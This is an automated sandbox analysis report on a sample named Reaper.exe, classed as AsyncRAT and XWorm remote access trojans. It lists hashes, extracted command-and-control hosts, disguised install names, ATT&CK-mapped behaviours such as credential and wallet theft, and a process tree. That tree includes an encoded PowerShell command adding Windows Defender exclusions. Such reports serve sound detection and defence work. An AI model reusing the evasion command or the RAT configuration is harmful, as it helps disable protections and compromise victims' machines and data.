asyncrat | a8e3cbf1921a2485a307ac0ff2536accc77bc17db386a00e8d67c5537613b321

Analysis

max time kernel
9s
max time network
138s
platform
windows11-21h2_x64
resource
win11-20240508-en
resource tags

arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
submitted
22-05-2024 05:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Reaper.exe
Size

8.4MB
MD5

caa418507bb991b91bbfa3e52623c2f4
SHA1

9e1083e019ca8813024e1e58eac193d7a83b4b48
SHA256

a8e3cbf1921a2485a307ac0ff2536accc77bc17db386a00e8d67c5537613b321
SHA512

84e57b9c0d88e67c2ebb3ef89df82b33b4d466b663fa1b43dd0c050b140fbc986135169c8840b4d91ed5921379579a85e743cda27184172a7a7eb87156c61684
SSDEEP

196608:SRyi9wysiM2+eLNxHPZe/eAwfPjprt/VU3jZoAp/aOROsEh/cH:SRLSIr+eLDvM9YBNMrQsh

Score

10^/10

asyncrat xworm default execution rat spyware stealer trojan upx

Malware Config

Extracted

Family

asyncrat

Version

L838 RAT v1.0.0

Botnet

Default

127.0.0.1:54984

127.0.0.1:4449

l838.ddns.net:54984

l838.ddns.net:4449

Mutex

azjrpxchkiev

Attributes

delay
1
install
true
install_file
Windows Driver Foundation.exe
install_folder
%Temp%

aes.plain

Extracted

Family

xworm

l838.ddns.net:3232

Attributes

Install_directory
%Public%
install_file
Windows Service Wrapper.exe

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Detect Xworm Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\Windows Service Wrapper.exe	family_xworm
behavioral1/memory/3960-68-0x00000000004D0000-0x00000000004E6000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
C:\Users\Admin\Windows Driver Foundation.exe	family_asyncrat

Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
3576	powershell.exe
4888	powershell.exe
7892	powershell.exe
6288	powershell.exe
5116	powershell.exe
6960	powershell.exe
6292	powershell.exe
5980	powershell.exe
1572	powershell.exe
6376	powershell.exe
6660	powershell.exe
340	powershell.exe
3700	powershell.exe
7068	powershell.exe
2028	powershell.exe
5536	powershell.exe
3364	powershell.exe
5392	powershell.exe
6800	powershell.exe
5948	powershell.exe
7484	powershell.exe
5448	powershell.exe
3420	powershell.exe
4952	powershell.exe
3840	powershell.exe
6984	powershell.exe
1592	powershell.exe
5192	powershell.exe
6328	powershell.exe
4472	powershell.exe
2436	powershell.exe
4104	powershell.exe
6852	powershell.exe
1732	powershell.exe
6188	powershell.exe
2896	powershell.exe
6928	powershell.exe
7620	powershell.exe
6672	powershell.exe
3124	powershell.exe
1468	powershell.exe
1652	powershell.exe
5316	powershell.exe
1700	powershell.exe
5416	powershell.exe
6200	powershell.exe
6304	powershell.exe
2000	powershell.exe
2100	powershell.exe
5476	powershell.exe
6692	powershell.exe
5344	powershell.exe
6916	powershell.exe
5376	powershell.exe
3412	powershell.exe
2832	powershell.exe
6196	powershell.exe
5912	powershell.exe
1292	powershell.exe
3268	powershell.exe
2708	powershell.exe
8012	powershell.exe
3316	powershell.exe
7224	powershell.exe

Executes dropped EXE 22 IoCs

Processes:

Windows Driver Foundation.exeWindows Service Wrapper.exeWindows Service Wrapper.exeWindows Driver Foundation.exeWindows SmartScreen.exeWindows SmartScreen.exeWindows Driver Foundation.exeWindows Service Wrapper.exeWindows SmartScreen.exeWindows SmartScreen.exeWindows Driver Foundation.exeWindows Service Wrapper.exeWindows SmartScreen.exeWindows SmartScreen.exeWindows Driver Foundation.exeWindows Service Wrapper.exeWindows SmartScreen.exeWindows SmartScreen.exeWindows Driver Foundation.exeWindows SmartScreen.exeWindows Service Wrapper.exeWindows SmartScreen.exe

pid	process
3336	Windows Driver Foundation.exe
3960	Windows Service Wrapper.exe
3316	Windows Service Wrapper.exe
3748	Windows Driver Foundation.exe
5000	Windows SmartScreen.exe
2088	Windows SmartScreen.exe
5084	Windows Driver Foundation.exe
4840	Windows Service Wrapper.exe
1592	Windows SmartScreen.exe
1260	Windows SmartScreen.exe
4124	Windows Driver Foundation.exe
4560	Windows Service Wrapper.exe
3416	Windows SmartScreen.exe
1156	Windows SmartScreen.exe
2852	Windows Driver Foundation.exe
4396	Windows Service Wrapper.exe
4524	Windows SmartScreen.exe
72	Windows SmartScreen.exe
2532	Windows Driver Foundation.exe
1292	Windows SmartScreen.exe
1488	Windows Service Wrapper.exe
5492	Windows SmartScreen.exe

Loads dropped DLL 64 IoCs

Processes:

Windows SmartScreen.exeWindows SmartScreen.exeWindows SmartScreen.exeWindows SmartScreen.exe

pid	process
2088	Windows SmartScreen.exe
2088	Windows SmartScreen.exe
2088	Windows SmartScreen.exe
2088	Windows SmartScreen.exe
2088	Windows SmartScreen.exe
1260	Windows SmartScreen.exe
1260	Windows SmartScreen.exe
1260	Windows SmartScreen.exe
1260	Windows SmartScreen.exe
1260	Windows SmartScreen.exe
2088	Windows SmartScreen.exe
2088	Windows SmartScreen.exe
2088	Windows SmartScreen.exe
2088	Windows SmartScreen.exe
2088	Windows SmartScreen.exe
2088	Windows SmartScreen.exe
2088	Windows SmartScreen.exe
2088	Windows SmartScreen.exe
2088	Windows SmartScreen.exe
2088	Windows SmartScreen.exe
2088	Windows SmartScreen.exe
1260	Windows SmartScreen.exe
1156	Windows SmartScreen.exe
1156	Windows SmartScreen.exe
1156	Windows SmartScreen.exe
2088	Windows SmartScreen.exe
1260	Windows SmartScreen.exe
1260	Windows SmartScreen.exe
1260	Windows SmartScreen.exe
1156	Windows SmartScreen.exe
1156	Windows SmartScreen.exe
1260	Windows SmartScreen.exe
1260	Windows SmartScreen.exe
1260	Windows SmartScreen.exe
1260	Windows SmartScreen.exe
1260	Windows SmartScreen.exe
1260	Windows SmartScreen.exe
1260	Windows SmartScreen.exe
1156	Windows SmartScreen.exe
1156	Windows SmartScreen.exe
1156	Windows SmartScreen.exe
1156	Windows SmartScreen.exe
1156	Windows SmartScreen.exe
1156	Windows SmartScreen.exe
1156	Windows SmartScreen.exe
1156	Windows SmartScreen.exe
1156	Windows SmartScreen.exe
1156	Windows SmartScreen.exe
1156	Windows SmartScreen.exe
72	Windows SmartScreen.exe
72	Windows SmartScreen.exe
72	Windows SmartScreen.exe
72	Windows SmartScreen.exe
72	Windows SmartScreen.exe
72	Windows SmartScreen.exe
72	Windows SmartScreen.exe
72	Windows SmartScreen.exe
72	Windows SmartScreen.exe
72	Windows SmartScreen.exe
72	Windows SmartScreen.exe
72	Windows SmartScreen.exe
72	Windows SmartScreen.exe
72	Windows SmartScreen.exe
72	Windows SmartScreen.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\_MEI50002\libffi-8.dll	upx
behavioral1/memory/2088-184-0x00007FF977560000-0x00007FF97756F000-memory.dmp	upx
behavioral1/memory/1260-271-0x00007FF95BAB0000-0x00007FF95C099000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50002\_bz2.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50002\_lzma.pyd	upx
behavioral1/memory/1260-281-0x00007FF976920000-0x00007FF97692F000-memory.dmp	upx
behavioral1/memory/1260-280-0x00007FF9767A0000-0x00007FF9767C3000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI15922\_ctypes.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI15922\python311.dll	upx
behavioral1/memory/2088-183-0x00007FF976930000-0x00007FF976953000-memory.dmp	upx
behavioral1/memory/2088-174-0x00007FF95C1C0000-0x00007FF95C7A9000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50002\select.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50002\_socket.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50002\sqlite3.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50002\_sqlite3.pyd	upx
behavioral1/memory/2088-290-0x00007FF9766E0000-0x00007FF97670D000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50002\_ssl.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50002\libcrypto-1_1.dll	upx
behavioral1/memory/2088-323-0x00007FF95B4F0000-0x00007FF95B5A8000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50002\_hashlib.pyd	upx
behavioral1/memory/2088-314-0x00007FF95B5B0000-0x00007FF95B928000-memory.dmp	upx
behavioral1/memory/2088-312-0x00007FF973740000-0x00007FF97376E000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50002\libssl-1_1.dll	upx
behavioral1/memory/2088-305-0x00007FF976790000-0x00007FF97679D000-memory.dmp	upx
behavioral1/memory/2088-304-0x00007FF973770000-0x00007FF973789000-memory.dmp	upx
behavioral1/memory/2088-299-0x00007FF95B930000-0x00007FF95BAA7000-memory.dmp	upx
behavioral1/memory/2088-298-0x00007FF9738F0000-0x00007FF973913000-memory.dmp	upx
behavioral1/memory/2088-297-0x00007FF9766C0000-0x00007FF9766D9000-memory.dmp	upx
behavioral1/memory/1260-387-0x00007FF973580000-0x00007FF9735AD000-memory.dmp	upx
behavioral1/memory/2088-396-0x00007FF95C1C0000-0x00007FF95C7A9000-memory.dmp	upx
behavioral1/memory/1260-405-0x00007FF9708D0000-0x00007FF9708FE000-memory.dmp	upx
behavioral1/memory/1260-428-0x00007FF95A2D0000-0x00007FF95A388000-memory.dmp	upx
behavioral1/memory/1260-427-0x00007FF959280000-0x00007FF9595F8000-memory.dmp	upx
behavioral1/memory/1260-423-0x00007FF95AB40000-0x00007FF95ACB7000-memory.dmp	upx
behavioral1/memory/1260-426-0x00007FF9708D0000-0x00007FF9708FE000-memory.dmp	upx
behavioral1/memory/1260-425-0x00007FF972C40000-0x00007FF972C4D000-memory.dmp	upx
behavioral1/memory/1260-416-0x00007FF9728A0000-0x00007FF9728AD000-memory.dmp	upx
behavioral1/memory/1260-415-0x00007FF971D30000-0x00007FF971D44000-memory.dmp	upx
behavioral1/memory/1260-414-0x00007FF95BAB0000-0x00007FF95C099000-memory.dmp	upx
behavioral1/memory/1260-412-0x00007FF9726A0000-0x00007FF9726B9000-memory.dmp	upx
behavioral1/memory/2088-411-0x00007FF976930000-0x00007FF976953000-memory.dmp	upx
behavioral1/memory/1156-410-0x00007FF970900000-0x00007FF970923000-memory.dmp	upx
behavioral1/memory/1260-409-0x00007FF95A2D0000-0x00007FF95A388000-memory.dmp	upx
behavioral1/memory/1260-408-0x00007FF959280000-0x00007FF9595F8000-memory.dmp	upx
behavioral1/memory/1260-404-0x00007FF972C40000-0x00007FF972C4D000-memory.dmp	upx
behavioral1/memory/1156-403-0x00007FF973730000-0x00007FF97373F000-memory.dmp	upx
behavioral1/memory/1260-402-0x00007FF95AB40000-0x00007FF95ACB7000-memory.dmp	upx
behavioral1/memory/1260-401-0x00007FF972A30000-0x00007FF972A53000-memory.dmp	upx
behavioral1/memory/1260-400-0x00007FF972A60000-0x00007FF972A79000-memory.dmp	upx
behavioral1/memory/2088-399-0x00007FF95ACC0000-0x00007FF95ADDC000-memory.dmp	upx
behavioral1/memory/1156-398-0x00007FF95ADE0000-0x00007FF95B3C9000-memory.dmp	upx
behavioral1/memory/2088-377-0x00007FF9737B0000-0x00007FF9737BD000-memory.dmp	upx
behavioral1/memory/2088-376-0x00007FF9735B0000-0x00007FF9735C4000-memory.dmp	upx
behavioral1/memory/1260-437-0x00007FF972A30000-0x00007FF972A53000-memory.dmp	upx
behavioral1/memory/1156-445-0x00007FF959100000-0x00007FF959277000-memory.dmp	upx
behavioral1/memory/1156-444-0x00007FF967D10000-0x00007FF967D33000-memory.dmp	upx
behavioral1/memory/1156-443-0x00007FF967E60000-0x00007FF967E79000-memory.dmp	upx
behavioral1/memory/1156-442-0x00007FF969020000-0x00007FF96904D000-memory.dmp	upx
behavioral1/memory/1260-436-0x00007FF972A60000-0x00007FF972A79000-memory.dmp	upx
behavioral1/memory/1260-435-0x00007FF9726A0000-0x00007FF9726B9000-memory.dmp	upx
behavioral1/memory/1260-434-0x00007FF973580000-0x00007FF9735AD000-memory.dmp	upx
behavioral1/memory/1260-433-0x00007FF976920000-0x00007FF97692F000-memory.dmp	upx
behavioral1/memory/1260-432-0x00007FF9767A0000-0x00007FF9767C3000-memory.dmp	upx
behavioral1/memory/1260-431-0x00007FF95BAB0000-0x00007FF95C099000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

1 ip-api.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

5704 schtasks.exe
Enumerates processes with tasklist 1 TTPs 4 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exe

pid process

6836 tasklist.exe
5628 tasklist.exe
4636 tasklist.exe
1044 tasklist.exe
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

5488 systeminfo.exe

flow	ioc
1	ip-api.com

pid	process
5704	schtasks.exe

pid	process
6836	tasklist.exe
5628	tasklist.exe
4636	tasklist.exe
1044	tasklist.exe

pid	process
5488	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
3420	powershell.exe
4952	powershell.exe
3420	powershell.exe
3420	powershell.exe
2000	powershell.exe
2000	powershell.exe
4952	powershell.exe
4952	powershell.exe
1732	powershell.exe
1732	powershell.exe
2000	powershell.exe
2000	powershell.exe
1500	powershell.exe
1500	powershell.exe
2100	powershell.exe
2100	powershell.exe
1500	powershell.exe
1500	powershell.exe
1732	powershell.exe
1732	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Windows Driver Foundation.exeWindows Service Wrapper.exeWindows Service Wrapper.exeWindows Driver Foundation.exepowershell.exepowershell.exeWindows Service Wrapper.exeWindows Driver Foundation.exeWindows Driver Foundation.exeWindows Service Wrapper.exepowershell.exepowershell.exeWindows Service Wrapper.exeWindows Driver Foundation.exe

description	pid	process
Token: SeDebugPrivilege	3336	Windows Driver Foundation.exe
Token: SeDebugPrivilege	3960	Windows Service Wrapper.exe
Token: SeDebugPrivilege	3316	Windows Service Wrapper.exe
Token: SeDebugPrivilege	3748	Windows Driver Foundation.exe
Token: SeDebugPrivilege	3420	powershell.exe
Token: SeDebugPrivilege	4952	powershell.exe
Token: SeDebugPrivilege	4840	Windows Service Wrapper.exe
Token: SeDebugPrivilege	5084	Windows Driver Foundation.exe
Token: SeDebugPrivilege	4124	Windows Driver Foundation.exe
Token: SeDebugPrivilege	4560	Windows Service Wrapper.exe
Token: SeDebugPrivilege	2000	powershell.exe
Token: SeIncreaseQuotaPrivilege	3336	Windows Driver Foundation.exe
Token: SeSecurityPrivilege	3336	Windows Driver Foundation.exe
Token: SeTakeOwnershipPrivilege	3336	Windows Driver Foundation.exe
Token: SeLoadDriverPrivilege	3336	Windows Driver Foundation.exe
Token: SeSystemProfilePrivilege	3336	Windows Driver Foundation.exe
Token: SeSystemtimePrivilege	3336	Windows Driver Foundation.exe
Token: SeProfSingleProcessPrivilege	3336	Windows Driver Foundation.exe
Token: SeIncBasePriorityPrivilege	3336	Windows Driver Foundation.exe
Token: SeCreatePagefilePrivilege	3336	Windows Driver Foundation.exe
Token: SeBackupPrivilege	3336	Windows Driver Foundation.exe
Token: SeRestorePrivilege	3336	Windows Driver Foundation.exe
Token: SeShutdownPrivilege	3336	Windows Driver Foundation.exe
Token: SeDebugPrivilege	3336	Windows Driver Foundation.exe
Token: SeSystemEnvironmentPrivilege	3336	Windows Driver Foundation.exe
Token: SeRemoteShutdownPrivilege	3336	Windows Driver Foundation.exe
Token: SeUndockPrivilege	3336	Windows Driver Foundation.exe
Token: SeManageVolumePrivilege	3336	Windows Driver Foundation.exe
Token: 33	3336	Windows Driver Foundation.exe
Token: 34	3336	Windows Driver Foundation.exe
Token: 35	3336	Windows Driver Foundation.exe
Token: 36	3336	Windows Driver Foundation.exe
Token: SeDebugPrivilege	1732	powershell.exe
Token: SeIncreaseQuotaPrivilege	3748	Windows Driver Foundation.exe
Token: SeSecurityPrivilege	3748	Windows Driver Foundation.exe
Token: SeTakeOwnershipPrivilege	3748	Windows Driver Foundation.exe
Token: SeLoadDriverPrivilege	3748	Windows Driver Foundation.exe
Token: SeSystemProfilePrivilege	3748	Windows Driver Foundation.exe
Token: SeSystemtimePrivilege	3748	Windows Driver Foundation.exe
Token: SeProfSingleProcessPrivilege	3748	Windows Driver Foundation.exe
Token: SeIncBasePriorityPrivilege	3748	Windows Driver Foundation.exe
Token: SeCreatePagefilePrivilege	3748	Windows Driver Foundation.exe
Token: SeBackupPrivilege	3748	Windows Driver Foundation.exe
Token: SeRestorePrivilege	3748	Windows Driver Foundation.exe
Token: SeShutdownPrivilege	3748	Windows Driver Foundation.exe
Token: SeDebugPrivilege	3748	Windows Driver Foundation.exe
Token: SeSystemEnvironmentPrivilege	3748	Windows Driver Foundation.exe
Token: SeRemoteShutdownPrivilege	3748	Windows Driver Foundation.exe
Token: SeUndockPrivilege	3748	Windows Driver Foundation.exe
Token: SeManageVolumePrivilege	3748	Windows Driver Foundation.exe
Token: 33	3748	Windows Driver Foundation.exe
Token: 34	3748	Windows Driver Foundation.exe
Token: 35	3748	Windows Driver Foundation.exe
Token: 36	3748	Windows Driver Foundation.exe
Token: SeDebugPrivilege	4396	Windows Service Wrapper.exe
Token: SeDebugPrivilege	2852	Windows Driver Foundation.exe
Token: SeIncreaseQuotaPrivilege	3336	Windows Driver Foundation.exe
Token: SeSecurityPrivilege	3336	Windows Driver Foundation.exe
Token: SeTakeOwnershipPrivilege	3336	Windows Driver Foundation.exe
Token: SeLoadDriverPrivilege	3336	Windows Driver Foundation.exe
Token: SeSystemProfilePrivilege	3336	Windows Driver Foundation.exe
Token: SeSystemtimePrivilege	3336	Windows Driver Foundation.exe
Token: SeProfSingleProcessPrivilege	3336	Windows Driver Foundation.exe
Token: SeIncBasePriorityPrivilege	3336	Windows Driver Foundation.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Reaper.exeReaper.exeWindows SmartScreen.exeReaper.exeWindows SmartScreen.exeReaper.exeWindows SmartScreen.exeWindows SmartScreen.exeReaper.exe

description	pid	process	target process
PID 1360 wrote to memory of 3420	1360	Reaper.exe	powershell.exe
PID 1360 wrote to memory of 3420	1360	Reaper.exe	powershell.exe
PID 1360 wrote to memory of 3420	1360	Reaper.exe	powershell.exe
PID 1360 wrote to memory of 1020	1360	Reaper.exe	Conhost.exe
PID 1360 wrote to memory of 1020	1360	Reaper.exe	Conhost.exe
PID 1360 wrote to memory of 1020	1360	Reaper.exe	Conhost.exe
PID 1360 wrote to memory of 3336	1360	Reaper.exe	Windows Driver Foundation.exe
PID 1360 wrote to memory of 3336	1360	Reaper.exe	Windows Driver Foundation.exe
PID 1360 wrote to memory of 3960	1360	Reaper.exe	Windows Service Wrapper.exe
PID 1360 wrote to memory of 3960	1360	Reaper.exe	Windows Service Wrapper.exe
PID 1020 wrote to memory of 4952	1020	Reaper.exe	powershell.exe
PID 1020 wrote to memory of 4952	1020	Reaper.exe	powershell.exe
PID 1020 wrote to memory of 4952	1020	Reaper.exe	powershell.exe
PID 1020 wrote to memory of 2096	1020	Reaper.exe	Reaper.exe
PID 1020 wrote to memory of 2096	1020	Reaper.exe	Reaper.exe
PID 1020 wrote to memory of 2096	1020	Reaper.exe	Reaper.exe
PID 1020 wrote to memory of 3748	1020	Reaper.exe	Windows Driver Foundation.exe
PID 1020 wrote to memory of 3748	1020	Reaper.exe	Windows Driver Foundation.exe
PID 1020 wrote to memory of 3316	1020	Reaper.exe	Windows Service Wrapper.exe
PID 1020 wrote to memory of 3316	1020	Reaper.exe	Windows Service Wrapper.exe
PID 1020 wrote to memory of 5000	1020	Reaper.exe	Windows SmartScreen.exe
PID 1020 wrote to memory of 5000	1020	Reaper.exe	Windows SmartScreen.exe
PID 5000 wrote to memory of 2088	5000	Windows SmartScreen.exe	Windows SmartScreen.exe
PID 5000 wrote to memory of 2088	5000	Windows SmartScreen.exe	Windows SmartScreen.exe
PID 2096 wrote to memory of 2000	2096	Reaper.exe	powershell.exe
PID 2096 wrote to memory of 2000	2096	Reaper.exe	powershell.exe
PID 2096 wrote to memory of 2000	2096	Reaper.exe	powershell.exe
PID 2096 wrote to memory of 2700	2096	Reaper.exe	Reaper.exe
PID 2096 wrote to memory of 2700	2096	Reaper.exe	Reaper.exe
PID 2096 wrote to memory of 2700	2096	Reaper.exe	Reaper.exe
PID 2096 wrote to memory of 5084	2096	Reaper.exe	Windows Service Wrapper.exe
PID 2096 wrote to memory of 5084	2096	Reaper.exe	Windows Service Wrapper.exe
PID 2096 wrote to memory of 4840	2096	Reaper.exe	Windows Service Wrapper.exe
PID 2096 wrote to memory of 4840	2096	Reaper.exe	Windows Service Wrapper.exe
PID 2096 wrote to memory of 1592	2096	Reaper.exe	Reaper.exe
PID 2096 wrote to memory of 1592	2096	Reaper.exe	Reaper.exe
PID 1592 wrote to memory of 1260	1592	Windows SmartScreen.exe	Windows SmartScreen.exe
PID 1592 wrote to memory of 1260	1592	Windows SmartScreen.exe	Windows SmartScreen.exe
PID 2700 wrote to memory of 1732	2700	Reaper.exe	powershell.exe
PID 2700 wrote to memory of 1732	2700	Reaper.exe	powershell.exe
PID 2700 wrote to memory of 1732	2700	Reaper.exe	powershell.exe
PID 2700 wrote to memory of 2336	2700	Reaper.exe	Conhost.exe
PID 2700 wrote to memory of 2336	2700	Reaper.exe	Conhost.exe
PID 2700 wrote to memory of 2336	2700	Reaper.exe	Conhost.exe
PID 2700 wrote to memory of 4124	2700	Reaper.exe	Windows Driver Foundation.exe
PID 2700 wrote to memory of 4124	2700	Reaper.exe	Windows Driver Foundation.exe
PID 2700 wrote to memory of 4560	2700	Reaper.exe	Windows Service Wrapper.exe
PID 2700 wrote to memory of 4560	2700	Reaper.exe	Windows Service Wrapper.exe
PID 2700 wrote to memory of 3416	2700	Reaper.exe	cmd.exe
PID 2700 wrote to memory of 3416	2700	Reaper.exe	cmd.exe
PID 2088 wrote to memory of 1948	2088	Windows SmartScreen.exe	cmd.exe
PID 2088 wrote to memory of 1948	2088	Windows SmartScreen.exe	cmd.exe
PID 2088 wrote to memory of 3412	2088	Windows SmartScreen.exe	powershell.exe
PID 2088 wrote to memory of 3412	2088	Windows SmartScreen.exe	powershell.exe
PID 3416 wrote to memory of 1156	3416	Windows SmartScreen.exe	Windows SmartScreen.exe
PID 3416 wrote to memory of 1156	3416	Windows SmartScreen.exe	Windows SmartScreen.exe
PID 2088 wrote to memory of 1896	2088	Windows SmartScreen.exe	cmd.exe
PID 2088 wrote to memory of 1896	2088	Windows SmartScreen.exe	cmd.exe
PID 2336 wrote to memory of 2100	2336	Reaper.exe	powershell.exe
PID 2336 wrote to memory of 2100	2336	Reaper.exe	powershell.exe
PID 2336 wrote to memory of 2100	2336	Reaper.exe	powershell.exe
PID 2336 wrote to memory of 3920	2336	Reaper.exe	Reaper.exe
PID 2336 wrote to memory of 3920	2336	Reaper.exe	Reaper.exe
PID 2336 wrote to memory of 3920	2336	Reaper.exe	Reaper.exe

Views/modifies file attributes 1 TTPs 2 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exe

pid process

6152 attrib.exe
3592 attrib.exe

pid	process
6152	attrib.exe
3592	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1360

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3420

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:1020

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4952

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:2096

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2000

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:2700

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1732

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
5⤵
- Suspicious use of WriteProcessMemory
PID:2336

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
